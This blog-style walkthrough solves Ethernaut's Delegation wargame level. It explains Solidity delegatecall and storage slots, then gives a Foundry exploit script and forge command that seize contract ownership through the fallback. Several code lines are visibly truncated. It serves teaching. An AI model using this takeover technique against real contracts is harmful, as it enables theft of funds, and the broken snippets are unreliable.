Ethernaut Level 06 - Delegation

Ethernaut Level 06 - Delegation

Analysis and solution for Ethernaut's level 06 - Delegation, with Solidity and Foundry


This level wants us to claim the ownership of the contract to win. The concept hidden in this contract is called a Delegate Call or delegatecall(). Let's dive in.

Delegate Call in Solidity

A delegate call is a special low-level call in Solidity to make external calls to another contract. Solidity By Example does an excellent job of explaining this.

Let's assume there are two contracts, similar to the one shown in Ethernaut's Delegation level, contracts A and B. When contract A executes delegatecall to contract B, B's code is executed with contract A's storage, msg.sender and msg.value.

This means that it is possible to modify a contract's storage using a code (malicious code) belonging to another contract. We will be exploiting this behavior in this blog.

The delegatecall has the following structure -

address.delegatecall(abi.encodeWithSignature("func_signature", "arguments"));


Let's first take a look at the Delegation contract. There's a fallback function:

fallback() external {
    (bool result,) = address(delegate).delegatecall(;
    if (result) {

We can see that the contract is making a delegate call to the address(delegate) or the first contract Delegate. This call is taking an input of which means whatever data was passed while calling the fallback function. Since we can trigger the fallback function, we can essentially control the passed inside the delegate call.

An interesting thing to note about delegate call is that whenever our user makes a call to contract Delegation, which in turn is making a delegate call to Delegate, the msg.sender received by the Delegate contract will be our user's address and not Delegation's address.

Let's see the Delegate contract. There's an interesting pwn() function as shown below:

function pwn() public {
    owner = msg.sender;

This will just assign a new owner to whoever calls the function. Note that the address public owner; variable is in slot 0 in both contracts.

The EVM stores each variable in slots -

contract Example {
    uint256 first;  // slot 0
    uint256 second; // slot 1

This plays an important role in exploitation. For proper storage mapping via a delegate call, the storage slot order should be the same otherwise the data will go into different variables.

To explain the slot arrangement, a whole other blog is needed so we won't be covering it here. It is recommended to go through this amazing article which explains it really well.

Things are coming together now.

To exploit this level:

  1. We need to trigger the fallback function in the Delegation contract to invoke the pwn() function via
  2. This will then make a delegate call to the Delegate contract and execute the pwn() function making our user (msg.sender) the owner of the Delegate contract.
  3. Since the caller contract's storage is modified, the value for the owner will be stored in slot 0 of the Delegation contract. Fortunately, both of these contracts slot 0 variables have the same name, owner, which will make us the owner in the Delegation contract.

The Exploit

Here's how our exploit code looks:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "forge-std/Script.sol";
import "../instances/Ilevel06.sol";

contract POC is Script {
    Delegation level6 = Delegation(0x36FcDCE0C27A8Fed39C1bF563FbC56359757D369);

    function run() external {

        console.log("Current owner is : ", level6.owner()); // checking current owner
        (bool success, ) = address(level6).call(abi.encodeWithSignature("pwn()")); // triggering callback with my
        console.log("Checking delegatecall result : ", success); // checking result for delegatecall
        console.log("New owner is : ", level6.owner()); // confirming new owner


In the PoC above, we are making a call() to the Delegation contract. The can be seen taking the pwn() function selector. Since there's no such function in the Delegation contract, the fallback will be triggered and the same will be sent to the Delegate contract, therefore, calling the actual pwn() function and making us the owner of the Delegation contract.

Let's execute the script using

forge script ./script/level06.sol --private-key $PKEY --broadcast --rpc-url $RPC_URL


Now that we are the new owner, let's submit the instance to finish the level.

My Github Repository containing all the codes:


  • Care should be taken when using a delegatecall() so that it does not accept user inputs either in its parameter or the address to which the call is to be made.
  • Check out the Parity Wallet Hack for a practical exploitation scenario.
